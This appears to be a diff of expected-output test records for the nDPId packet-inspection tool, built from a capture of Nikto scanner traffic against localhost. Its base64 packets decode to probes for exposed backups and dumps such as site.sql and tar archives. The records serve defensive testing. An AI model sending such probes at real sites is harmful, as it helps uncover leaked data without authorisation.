+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":1,"flow_last_seen":1576420277313,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277313,"pkt":"AAAAAAAAAAAAAAAACABFAADESF9AAEAG89J\/AAABfwAAAcSyH5CXAnDudCS+HoAYAED+uAAAAQEICp1m\/WmdZv1oR0VUIC8xMjcwMC50YXIuZ3ogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":1,"flow_last_seen":1576420277314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277314,"pkt":"AAAAAAAAAAAAAAAACABFAADEBf5AAEAGNjR\/AAABfwAAAcS0H5ApMj1NA0MOSIAYAED+uAAAAQEICp1m\/WqdZv1qR0VUIC8xMjcwMC50YXIuZ3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":1,"flow_last_seen":1576420277315,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277315,"pkt":"AAAAAAAAAAAAAAAACABFAADC35NAAEAGXKB\/AAABfwAAAcS2H5BI6+ciGxVy6IAYAED+tgAAAQEICp1m\/WudZv1rR0VUIC8xLnRhci5sem1hIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":1,"flow_last_seen":1576420277317,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277317,"pkt":"AAAAAAAAAAAAAAAACABFAADCBO9AAEAGN0V\/AAABfwAAAcS4H5BQkTxdjeN4aIAYAED+tgAAAQEICp1m\/W2dZv1tR0VUIC8xLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":1,"flow_last_seen":1576420277319,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277319,"pkt":"AAAAAAAAAAAAAAAACABFAADAyGZAAEAGc89\/AAABfwAAAcS6H5BukfDWpxxv14AYAED+tAAAAQEICp1m\/W+dZv1vR0VUIC9zaXRlLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":1,"flow_last_seen":1576420277321,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277321,"pkt":"AAAAAAAAAAAAAAAACABFAADAwiFAAEAGehR\/AAABfwAAAcS8H5DDVvqu6KD2KYAYAED+tAAAAQEICp1m\/XGdZv1xR0VUIC9zaXRlLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":1,"flow_last_seen":1576420277322,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277322,"pkt":"AAAAAAAAAAAAAAAACABFAADBuGlAAEAGg8t\/AAABfwAAAcS+H5BzjYDWLFz9IYAYAED+tQAAAQEICp1m\/XKdZv1yR0VUIC8xMjcuMC5jZXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":1,"flow_last_seen":1576420277324,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277324,"pkt":"AAAAAAAAAAAAAAAACABFAADB11JAAEAGZOJ\/AAABfwAAAcTAH5DtMO\/kM\/E\/tYAYAED+tQAAAQEICp1m\/XSdZv10R0VUIC8xMjcuMC5jZXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 